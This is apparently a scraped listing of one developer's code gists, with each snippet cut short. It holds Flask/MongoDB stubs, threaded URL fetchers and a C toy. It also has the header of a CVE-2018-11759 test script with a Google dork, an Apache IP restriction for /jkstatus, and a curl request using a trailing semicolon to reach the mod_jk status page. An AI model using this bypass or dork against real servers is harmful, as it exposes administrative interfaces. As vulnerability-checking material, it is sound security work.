This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# -*- Coding: utf-8 -*- | |
from flask import Flask, jsonify | |
from pymongo import MongoClient | |
import os | |
app = Flask(__name__) | |
# Conectio my | |
client = MongoClient('mongodb://example:[email protected]/images',45704) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python3 | |
# -*- Coding: utf-8 -*- | |
from multiprocessing.dummy import Pool as ThreadPool | |
from flask import Flask, jsonify | |
from pymongo import MongoClient | |
import os | |
app = Flask(__name__) | |
# Conectio my |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wget \ | |
https://gist.githubusercontent.com/Jul10l1r4/27b2b4c8ab4005e480514419bc949f5e/raw/9a9a08f378170736a09c2bce6906d8abdc14084c/urllib-with-threads.py \ | |
https://gist.githubusercontent.com/Jul10l1r4/1fd4ad230f82ce4c28a493ee5c72dbb9/raw/99b7fd818b1574ff278c225baa0b46583f915441/requests.py |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import urllib2 | |
from multiprocessing.dummy import Pool as ThreadPool | |
import time | |
# Urls a ser percorrido | |
urls = [ | |
'https://www.google.com', | |
'http://www.python.org/about/', | |
'https://jul10l1r4.github.io', | |
'https://facebook.com', | |
'https://twitter.com', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import urllib2 | |
import time | |
# lista a ser percorrida | |
urls = [ | |
'https://www.google.com', | |
'http://www.python.org/about/', | |
'https://jul10l1r4.github.io', | |
'https://facebook.com', | |
'https://twitter.com', | |
'https://youtube.com', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
void main () | |
{ | |
register char *text = "i'm speed\n"; | |
write(0,text,10); | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# CVE 2018-11759 | |
# Author: Julio Lira <[email protected]> | |
# Colaborator: Fernando Eloi <[email protected]> | |
# date: 12/07/2018 | MM/DD/YYYY | |
# License: GNU GPL version 3 | |
# Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html | |
# Description: This script was a test for verify if the application is vulnerable at CVE 2018-11759. | |
# Google Dork: ["JK Status Manager for"] | |
# Vendor Homepage: [http://tomcat.apache.org/] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
echo "testetetetetetetetetetetetetetetetetevv"; | |
?> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Location "/jkstatus"> | |
... | |
Require ip informa_os_ips | |
</Location> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl "http://localhost/jkstatus;" | |
<?xml version="1.0" encoding="ISO-8859-1"?> | |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> | |
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>JK Status Manager</title></head> | |
<body> | |
<h1>JK Status Manager for localhost:8080</h1> | |
<table><tr><td>Server Version:</td><td>Apache/2.4.6 (CentOS) mod_jk/1.2.44</td><td> </td><td>Server Time:</td><td>2018-11-01 09:05:49 +0000</td></tr> | |
<tr><td>JK Version:</td><td>mod_jk/1.2.44</td><td></td><td>Unix Seconds:</td><td>1541063149</td></tr></table> |